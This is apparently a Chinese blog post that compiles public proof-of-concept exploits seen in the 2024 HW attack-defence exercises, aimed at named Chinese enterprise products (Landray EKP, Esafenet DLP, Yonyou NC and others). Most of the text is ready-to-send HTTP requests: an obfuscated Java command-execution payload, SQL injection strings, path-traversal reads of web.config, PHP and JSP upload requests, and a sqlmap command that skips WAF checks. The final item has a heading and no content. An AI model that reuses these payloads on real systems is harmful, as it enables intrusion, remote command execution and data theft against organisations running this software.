护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?

admin
admin
admin
139379
文章
114
评论
2025年4月24日21:16:04评论0 views字数 42783阅读142分36秒阅读模式
声明:无恶意引导,漏洞信息以及poc网上均已公开,此文章进行漏洞资源整合复盘,仅供师傅们参考。
【前言】
  小伙伴们一年一度的护网攻防即将开始,你们的实力提升如何了?是不是又在幻想要打穿哪家企业了?那就让蓝方工程师尝尝你们新的“绝招”吧。
       在2024年护网攻防演练的硝烟散尽后,一组数据令人心惊:超过60%的企业靶标在24小时内被攻破,而攻击者最常用的武器竟是3个已公开修复的'旧漏洞'。
去年护网行动中,攻击者展现出前所未有的技术协同能力——从云原生架构的权限逃逸,到AI生成的钓鱼代码混淆检测,再到供应链漏洞的精准投毒,网络安全防线正面临多维度的撕裂。
      本文结合一些实战案例,深度拆解2024年护网行动中高频出现的十大高危漏洞,揭露黑产团伙如何将漏洞武器化形成完整攻击链,并为企业的常态化防御提供关键决策参考。下一场攻防战来临前,你的安全水位线达标了吗?
护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?
【以下是一些已公开的系统漏洞和一些漏洞poc】
一、蓝凌EKP存在sys_ui_component远程命令执行漏洞
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 Host:  Accept:application/json,text/javascript,*/*;q=0.01 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8 Connection:close Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 UserAgent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83. 0.4103.116Safari/537.36 X-Requested-With:XMLHttpRequest Content-Length: 395 ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition:form-data;name="method" replaceExtend ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition:form-data;name="extendId" ../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition:form-data;name="folderName" ../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51-
护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?
poc2
 POST /resource/help/km/review/dataxml.jsp HTTP/1.1 Host User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,  like Gecko) Chrome/113.0.0.0 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Cmd: echo stctest
 s_bean=ruleFormulaValidate&script=u0020u0020u0020u0020u0062u006fu006fu006cu006 5u0061u006eu0020u0066u006cu0061u0067u0020u003du0020u0066u0061u006cu0073u 0065u003bu0054u0068u0072u0065u0061u0064u0047u0072u006fu0075u0070u0020u006 7u0072u006fu0075u0070u0020u003du0020u0054u0068u0072u0065u0061u0064u002eu 0063u0075u0072u0072u0065u006eu0074u0054u0068u0072u0065u0061u0064u0028u002 9u002eu0067u0065u0074u0054u0068u0072u0065u0061u0064u0047u0072u006fu0075u 0070u0028u0029u003bu006au0061u0076u0061u002eu006cu0061u006eu0067u002eu007 2u0065u0066u006cu0065u0063u0074u002eu0046u0069u0065u006cu0064u0020u0066u 0020u003du0020u0067u0072u006fu0075u0070u002eu0067u0065u0074u0043u006cu006 1u0073u0073u0028u0029u002eu0067u0065u0074u0044u0065u0063u006cu0061u0072u 0065u0064u0046u0069u0065u006cu0064u0028u0022u0074u0068u0072u0065u0061u006 4u0073u0022u0029u003bu0066u002eu0073u0065u0074u0041u0063u0063u0065u0073u 0073u0069u0062u006cu0065u0028u0074u0072u0075u0065u0029u003bu0054u0068u007 2u0065u0061u0064u005bu005du0020u0074u0068u0072u0065u0061u0064u0073u0020u 003du0020u0028u0054u0068u0072u0065u0061u0064u005bu005du0029u0020u0066u002 eu0067u0065u0074u0028u0067u0072u006fu0075u0070u0029u003bu0066u006fu0072u 0020u0028u0069u006eu0074u0020u0069u0020u003du0020u0030u003bu0020u0069u002 0u003cu0020u0074u0068u0072u0065u0061u0064u0073u002eu006cu0065u006eu0067u 0074u0068u003bu0020u0069u002bu002bu0029u0020u007bu0020u0074u0072u0079u002 0u007bu0020u0054u0068u0072u0065u0061u0064u0020u0074u0020u003du0020u0074u 0068u0072u0065u0061u0064u0073u005bu0069u005du003bu0069u0066u0020u0028u007 4u0020u003du003du0020u006eu0075u006cu006cu0029u0020u007bu0020u0063u006fu 006eu0074u0069u006eu0075u0065u003bu0020u007du0053u0074u0072u0069u006eu006 7u0020u0073u0074u0072u0020u003du0020u0074u002eu0067u0065u0074u004eu0061u 006du0065u0028u0029u003bu0069u0066u0020u0028u0073u0074u0072u002eu0063u006 fu006eu0074u0061u0069u006eu0073u0028u0022u0065u0078u0065u0063u0022u0029u 0020u007cu007cu0020u0021u0073u0074u0072u002eu0063u006fu006eu0074u0061u006 9u006eu0073u0028u0022u0068u0074u0074u0070u0022u0029u0029u0020u007bu0020u 0063u006fu006eu0074u0069u006eu0075u0065u003bu0020u007du0066u0020u003du002 0u0074u002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u 0065u0074u0044u0065u0063u006cu0061u0072u0065u0064u0046u0069u0065u006cu006 4u0028u0022u0074u0061u0072u0067u0065u0074u0022u0029u003bu0066u002eu0073u 0065u0074u0041u0063u0063u0065u0073u0073u0069u0062u006cu0065u0028u0074u007 2u0075u0065u0029u003bu004fu0062u006au0065u0063u0074u0020u006fu0062u006au 0020u003du0020u0066u002eu0067u0065u0074u0028u0074u0029u003bu0069u0066u002 0u0028u0021u0028u006fu0062u006au0020u0069u006eu0073u0074u0061u006eu0063u 0065u006fu0066u0020u0052u0075u006eu006eu0061u0062u006cu0065u0029u0029u002 0u007bu0020u0063u006fu006eu0074u0069u006eu0075u0065u003bu0020u007du0066u 0020u003du0020u006fu0062u006au002eu0067u0065u0074u0043u006cu0061u0073u007 3u0028u0029u002eu0067u0065u0074u0044u0065u0063u006cu0061u0072u0065u0064u 0046u0069u0065u006cu0064u0028u0022u0074u0068u0069u0073u0024u0030u0022u002 9u003bu0066u002eu0073u0065u0074u0041u0063u0063u0065u0073u0073u0069u0062u 006cu0065u0028u0074u0072u0075u0065u0029u003bu006fu0062u006au0020u003du002 0u0066u002eu0067u0065u0074u0028u006fu0062u006au0029u003bu0074u0072u0079u 0020u007bu0020u0066u0020u003du0020u006fu0062u006au002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u0044u0065u0063u006cu 0061u0072u0065u0064u0046u0069u0065u006cu0064u0028u0022u0068u0061u006eu006 4u006cu0065u0072u0022u0029u003bu0020u007du0020u0063u0061u0074u0063u0068u 0020u0028u004eu006fu0053u0075u0063u0068u0046u0069u0065u006cu0064u0045u007 8u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u0020u007bu0020u0066u 0020u003du0020u006fu0062u006au002eu0067u0065u0074u0043u006cu0061u0073u007 3u0028u0029u002eu0067u0065u0074u0053u0075u0070u0065u0072u0063u006cu0061u 0073u0073u0028u0029u002eu0067u0065u0074u0053u0075u0070u0065u0072u0063u006 cu0061u0073u0073u0028u0029u002eu0067u0065u0074u0044u0065u0063u006cu0061u 0072u0065u0064u0046u0069u0065u006cu0064u0028u0022u0068u0061u006eu0064u006 cu0065u0072u0022u0029u003bu0020u007du0066u002eu0073u0065u0074u0041u0063u 0063u0065u0073u0073u0069u0062u006cu0065u0028u0074u0072u0075u0065u0029u003 bu006fu0062u006au0020u003du0020u0066u002eu0067u0065u0074u0028u006fu0062u 006au0029u003bu0074u0072u0079u0020u007bu0020u0066u0020u003du0020u006fu006 2u006au002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u 0065u0074u0053u0075u0070u0065u0072u0063u006cu0061u0073u0073u0028u0029u002 eu0067u0065u0074u0044u0065u0063u006cu0061u0072u0065u0064u0046u0069u0065u 006cu0064u0028u0022u0067u006cu006fu0062u0061u006cu0022u0029u003bu0020u007 du0020u0063u0061u0074u0063u0068u0020u0028u004eu006fu0053u0075u0063u0068u 0046u0069u0065u006cu0064u0045u0078u0063u0065u0070u0074u0069u006fu006eu002 0u0065u0029u0020u007bu0020u0066u0020u003du0020u006fu0062u006au002eu0067u 0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u0044u006 5u0063u006cu0061u0072u0065u0064u0046u0069u0065u006cu0064u0028u0022u0067u 006cu006fu0062u0061u006cu0022u0029u003bu0020u007du0066u002eu0073u0065u007 4u0041u0063u0063u0065u0073u0073u0069u0062u006cu0065u0028u0074u0072u0075u 0065u0029u003bu006fu0062u006au0020u003du0020u0066u002eu0067u0065u0074u002 8u006fu0062u006au0029u003bu0066u0020u003du0020u006fu0062u006au002eu0067u 0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u0044u006 5u0063u006cu0061u0072u0065u0064u0046u0069u0065u006cu0064u0028u0022u0070u 0072u006fu0063u0065u0073u0073u006fu0072u0073u0022u0029u003bu0066u002eu007 3u0065u0074u0041u0063u0063u0065u0073u0073u0069u0062u006cu0065u0028u0074u 0072u0075u0065u0029u003bu006au0061u0076u0061u002eu0075u0074u0069u006cu002 eu004cu0069u0073u0074u0020u0070u0072u006fu0063u0065u0073u0073u006fu0072u 0073u0020u003du0020u0028u006au0061u0076u0061u002eu0075u0074u0069u006cu002 eu004cu0069u0073u0074u0029u0020u0028u0066u002eu0067u0065u0074u0028u006fu 0062u006au0029u0029u003bu0066u006fu0072u0020u0028u0069u006eu0074u0020u006 au0020u003du0020u0030u003bu0020u006au0020u003cu0020u0070u0072u006fu0063u 0065u0073u0073u006fu0072u0073u002eu0073u0069u007au0065u0028u0029u003bu002 0u002bu002bu006au0029u0020u007bu0020u004fu0062u006au0065u0063u0074u0020u 0070u0072u006fu0063u0065u0073u0073u006fu0072u0020u003du0020u0070u0072u006 fu0063u0065u0073u0073u006fu0072u0073u002eu0067u0065u0074u0028u006au0029u 003bu0066u0020u003du0020u0070u0072u006fu0063u0065u0073u0073u006fu0072u002 eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u 0044u0065u0063u006cu0061u0072u0065u0064u0046u0069u0065u006cu0064u0028u002 2u0072u0065u0071u0022u0029u003bu0066u002eu0073u0065u0074u0041u0063u0063u 0065u0073u0073u0069u0062u006cu0065u0028u0074u0072u0075u0065u0029u003bu004 fu0062u006au0065u0063u0074u0020u0072u0065u0071u0020u003du0020u0066u002eu 0067u0065u0074u0028u0070u0072u006fu0063u0065u0073u0073u006fu0072u0029u003 bu004fu0062u006au0065u0063u0074u0020u0072u0065u0073u0070u0020u003du0020u 0072u0065u0071u002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002 eu0067u0065u0074u004du0065u0074u0068u006fu0064u0028u0022u0067u0065u0074u 0052u0065u0073u0070u006fu006eu0073u0065u0022u002cu0020u006eu0065u0077u002 0u0043u006cu0061u0073u0073u005bu0030u005du0029u002eu0069u006eu0076u006fu 006bu0065u0028u0072u0065u0071u002cu0020u006eu0065u0077u0020u004fu0062u006 au0065u0063u0074u005bu0030u005du0029u003bu0073u0074u0072u0020u003du0020u 0028u0053u0074u0072u0069u006eu0067u0029u0020u0072u0065u0071u002eu0067u006 5u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u004du0065u 0074u0068u006fu0064u0028u0022u0067u0065u0074u0048u0065u0061u0064u0065u0072u0022u002cu0020u006eu0065u0077u0020u0043u006cu0061u0073u0073u005bu005du 007bu0053u0074u0072u0069u006eu0067u002eu0063u006cu0061u0073u0073u007du002 9u002eu0069u006eu0076u006fu006bu0065u0028u0072u0065u0071u002cu0020u006eu 0065u0077u0020u004fu0062u006au0065u0063u0074u005bu005du007bu0022u0043u006 du0064u0022u007du0029u003bu0069u0066u0020u0028u0073u0074u0072u0020u0021u 003du0020u006eu0075u006cu006cu0020u0026u0026u0020u0021u0073u0074u0072u002 eu0069u0073u0045u006du0070u0074u0079u0028u0029u0029u0020u007bu0020u0072u 0065u0073u0070u002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002 eu0067u0065u0074u004du0065u0074u0068u006fu0064u0028u0022u0073u0065u0074u 0053u0074u0061u0074u0075u0073u0022u002cu0020u006eu0065u0077u0020u0043u006 cu0061u0073u0073u005bu005du007bu0069u006eu0074u002eu0063u006cu0061u0073u 0073u007du0029u002eu0069u006eu0076u006fu006bu0065u0028u0072u0065u0073u007 0u002cu0020u006eu0065u0077u0020u004fu0062u006au0065u0063u0074u005bu005du 007bu006eu0065u0077u0020u0049u006eu0074u0065u0067u0065u0072u0028u0032u003 0u0030u0029u007du0029u003bu0053u0074u0072u0069u006eu0067u005bu005du0020u 0063u006du0064u0073u0020u003du0020u0053u0079u0073u0074u0065u006du002eu006 7u0065u0074u0050u0072u006fu0070u0065u0072u0074u0079u0028u0022u006fu0073u 002eu006eu0061u006du0065u0022u0029u002eu0074u006fu004cu006fu0077u0065u007 2u0043u0061u0073u0065u0028u0029u002eu0063u006fu006eu0074u0061u0069u006eu 0073u0028u0022u0077u0069u006eu0064u006fu0077u0022u0029u0020u003fu0020u006 eu0065u0077u0020u0053u0074u0072u0069u006eu0067u005bu005du007bu0022u0063u 006du0064u002eu0065u0078u0065u0022u002cu0020u0022u002fu0063u0022u002cu002 0u0073u0074u0072u007du0020u003au0020u006eu0065u0077u0020u0053u0074u0072u 0069u006eu0067u005bu005du007bu0022u002fu0062u0069u006eu002fu0073u0068u002 2u002cu0020u0022u002du0063u0022u002cu0020u0073u0074u0072u007du003bu0053u 0074u0072u0069u006eu0067u0020u0063u0068u0061u0072u0073u0065u0074u004eu006 1u006du0065u0020u003du0020u0053u0079u0073u0074u0065u006du002eu0067u0065u 0074u0050u0072u006fu0070u0065u0072u0074u0079u0028u0022u006fu0073u002eu006 eu0061u006du0065u0022u0029u002eu0074u006fu004cu006fu0077u0065u0072u0043u 0061u0073u0065u0028u0029u002eu0063u006fu006eu0074u0061u0069u006eu0073u002 8u0022u0077u0069u006eu0064u006fu0077u0022u0029u0020u003fu0020u0022u0047u 0042u004bu0022u003au0022u0055u0054u0046u002du0038u0022u003bu0062u0079u007 4u0065u005bu005du0020u0074u0065u0078u0074u0032u0020u003du0028u006eu0065u 0077u0020u006au0061u0076u0061u002eu0075u0074u0069u006cu002eu0053u0063u006 1u006eu006eu0065u0072u0028u0028u006eu0065u0077u0020u0050u0072u006fu0063u 0065u0073u0073u0042u0075u0069u006cu0064u0065u0072u0028u0063u006du0064u007 3u0029u0029u002eu0073u0074u0061u0072u0074u0028u0029u002eu0067u0065u0074u 0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u002cu006 3u0068u0061u0072u0073u0065u0074u004eu0061u006du0065u0029u0029u002eu0075u 0073u0065u0044u0065u006cu0069u006du0069u0074u0065u0072u0028u0022u005cu005 cu0041u0022u0029u002eu006eu0065u0078u0074u0028u0029u002eu0067u0065u0074u 0042u0079u0074u0065u0073u0028u0063u0068u0061u0072u0073u0065u0074u004eu006 1u006du0065u0029u003bu0062u0079u0074u0065u005bu005du0020u0072u0065u0073u 0075u006cu0074u003du0028u0022u0045u0078u0065u0063u0075u0074u0065u003au002 0u0020u0020u0020u0022u002bu006eu0065u0077u0020u0053u0074u0072u0069u006eu 0067u0028u0074u0065u0078u0074u0032u002cu0022u0075u0074u0066u002du0038u002 2u0029u0029u002eu0067u0065u0074u0042u0079u0074u0065u0073u0028u0063u0068u 0061u0072u0073u0065u0074u004eu0061u006du0065u0029u003bu0074u0072u0079u002 0u007bu0020u0043u006cu0061u0073u0073u0020u0063u006cu0073u0020u003du0020u 0043u006cu0061u0073u0073u002eu0066u006fu0072u004eu0061u006du0065u0028u002 2u006fu0072u0067u002eu0061u0070u0061u0063u0068u0065u002eu0074u006fu006du 0063u0061u0074u002eu0075u0074u0069u006cu002eu0062u0075u0066u002eu0042u007 9u0074u0065u0043u0068u0075u006eu006bu0022u0029u003bu006fu0062u006au0020u 003du0020u0063u006cu0073u002eu006eu0065u0077u0049u006eu0073u0074u0061u006 eu0063u0065u0028u0029u003bu0063u006cu0073u002eu0067u0065u0074u0044u0065u 0063u006cu0061u0072u0065u0064u004du0065u0074u0068u006fu0064u0028u0022u007 3u0065u0074u0042u0079u0074u0065u0073u0022u002cu0020u006eu0065u0077u0020u 0043u006cu0061u0073u0073u005bu005du007bu0062u0079u0074u0065u005bu005du002eu0063u006cu0061u0073u0073u002cu0020u0069u006eu0074u002eu0063u006cu0061u 0073u0073u002cu0020u0069u006eu0074u002eu0063u006cu0061u0073u0073u007du002 9u002eu0069u006eu0076u006fu006bu0065u0028u006fu0062u006au002cu0020u006eu 0065u0077u0020u004fu0062u006au0065u0063u0074u005bu005du007bu0072u0065u007 3u0075u006cu0074u002cu0020u006eu0065u0077u0020u0049u006eu0074u0065u0067u 0065u0072u0028u0030u0029u002cu0020u006eu0065u0077u0020u0049u006eu0074u006 5u0067u0065u0072u0028u0072u0065u0073u0075u006cu0074u002eu006cu0065u006eu 0067u0074u0068u0029u007du0029u003bu0072u0065u0073u0070u002eu0067u0065u007 4u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u004du0065u0074u 0068u006fu0064u0028u0022u0064u006fu0057u0072u0069u0074u0065u0022u002cu002 0u006eu0065u0077u0020u0043u006cu0061u0073u0073u005bu005du007bu0063u006cu 0073u007du0029u002eu0069u006eu0076u006fu006bu0065u0028u0072u0065u0073u007 0u002cu0020u006eu0065u0077u0020u004fu0062u006au0065u0063u0074u005bu005du 007bu006fu0062u006au007du0029u003bu0020u007du0020u0063u0061u0074u0063u006 8u0020u0028u004eu006fu0053u0075u0063u0068u004du0065u0074u0068u006fu0064u 0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0076u0061u0072u0035u002 9u0020u007bu0020u0043u006cu0061u0073u0073u0020u0063u006cu0073u0020u003du 0020u0043u006cu0061u0073u0073u002eu0066u006fu0072u004eu0061u006du0065u002 8u0022u006au0061u0076u0061u002eu006eu0069u006fu002eu0042u0079u0074u0065u 0042u0075u0066u0066u0065u0072u0022u0029u003bu006fu0062u006au0020u003du002 0u0063u006cu0073u002eu0067u0065u0074u0044u0065u0063u006cu0061u0072u0065u 0064u004du0065u0074u0068u006fu0064u0028u0022u0077u0072u0061u0070u0022u002 cu0020u006eu0065u0077u0020u0043u006cu0061u0073u0073u005bu005du007bu0062u 0079u0074u0065u005bu005du002eu0063u006cu0061u0073u0073u007du0029u002eu006 9u006eu0076u006fu006bu0065u0028u0063u006cu0073u002cu0020u006eu0065u0077u 0020u004fu0062u006au0065u0063u0074u005bu005du007bu0072u0065u0073u0075u006 cu0074u007du0029u003bu0072u0065u0073u0070u002eu0067u0065u0074u0043u006cu 0061u0073u0073u0028u0029u002eu0067u0065u0074u004du0065u0074u0068u006fu006 4u0028u0022u0064u006fu0057u0072u0069u0074u0065u0022u002cu0020u006eu0065u 0077u0020u0043u006cu0061u0073u0073u005bu005du007bu0063u006cu0073u007du002 9u002eu0069u006eu0076u006fu006bu0065u0028u0072u0065u0073u0070u002cu0020u 006eu0065u0077u0020u004fu0062u006au0065u0063u0074u005bu005du007bu006fu006 2u006au007du0029u003bu0020u007du0066u006cu0061u0067u0020u003du0020u0074u 0072u0075u0065u003bu0020u007du0069u0066u0020u0028u0066u006cu0061u0067u002 9u0020u007bu0020u0062u0072u0065u0061u006bu003bu0020u007du0020u007du0069u 0066u0020u0028u0066u006cu0061u0067u0029u0020u007bu0020u0062u0072u0065u006 1u006bu003bu0020u007du0020u007du0020u0063u0061u0074u0063u0068u0020u0028u 0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u0020u007bu002 0u0063u006fu006eu0074u0069u006eu0075u0065u003bu0020u007du0020u007d&modelNa me=test
二、亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞
 POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host:  Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="124""Google Chrome";v="124""Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer:  Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3' --
三、天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
四、赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
 GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1 Host Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJ GXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1;  ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl Priority: u=0, i User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101  Firefox/128.0 Accept text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,i mage/svg+xml,*/*;q=0.8 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1
五、赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
 GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1 Host User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close
六、数字通指尖云平台-智慧政务payslip SQL注入漏洞
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0Accepttext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: GOASESSID=i589f58naalabocmbidup7edl3Upgrade-Insecure-Requests: 1
七、通天星CMSV6车载定位监控平台disable存在SQL注入
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1HostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Connection: closeX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip, deflate
八、AnalyticsCloud 分析云存在任意文件读取漏洞
 GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1 Host User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
九、、SuiteCRM responseEntryPoint存在SQL注入漏洞
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+&type=c&response=accept HTTP/1.1 Host:  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close
十、亿赛通数据泄露防护(DLP)系统NetSecConfigAjax接口存在SQL注入漏洞
 POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host:  Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="124""Google Chrome";v="124""Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer:  Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-
十一、用友NC querygoodsgridbycode存在SQL注入漏洞
 GET /ecp/productonsale/querygoodsgridbycode.json? code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C% 7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976% 3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCH R%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1 Host:  Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Pragma: no-cache Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like  Gecko) Chrome/125.0.0.0 Safari/537.36 Accept:  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cache-Control: no-cache
十二、云课网校系统uploadImage存在任意文件上传漏洞
 POST /api/uploader/uploadImage HTTP/1.1 Host: xx.xx.xx.xx Accept:  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m x-requested-with: XMLHttpRequest ------WebKitFormBoundaryLZbmKeasWgo2gPtU Content-Disposition: form-data; name="file"; filename="1G3311040N.php" Content-Type: image/gif ------WebKitFormBoundaryLZbmKeasWgo2gPtU--
十三、浪潮云财务系统存在命令执行
浪潮云财务系统路径 /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx /cwbase/service/rps/xtdysrv.asmx
十四、润乾报表前台任意文件上传漏洞
 POST /InputServlet?action=12 HTTP/1.1 User-AgentMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML like GeckoChrome/93.0.4577.63 Safari/537.36 Content-Type: multipart/form-data; boundary=00content0boundary00 Host Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length241 Connection: close --00content0boundary00 Content-Disposition: form-data; name="upsize" 1024 --00content0boundary00 Content-Disposition: form-data; name="file"; filename="/..\..\..2211.jsp" Content-Type: image/jpeg 123 --00content0boundary00--
十五、启明星辰 天玥网络安全审计系统 SQL 注入漏洞
 app="启明星辰-天玥网络安全审计" python3 sqlmap.py -r test.txt --batch --skip-waf --random-agent --dbs --force-ssl POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 Host Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like  Gecko) Chrome/121.0.0.0 Safari/537.36 Connection: close checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
十六、致远 OA fileUpload.do 前台文件上传绕过漏洞
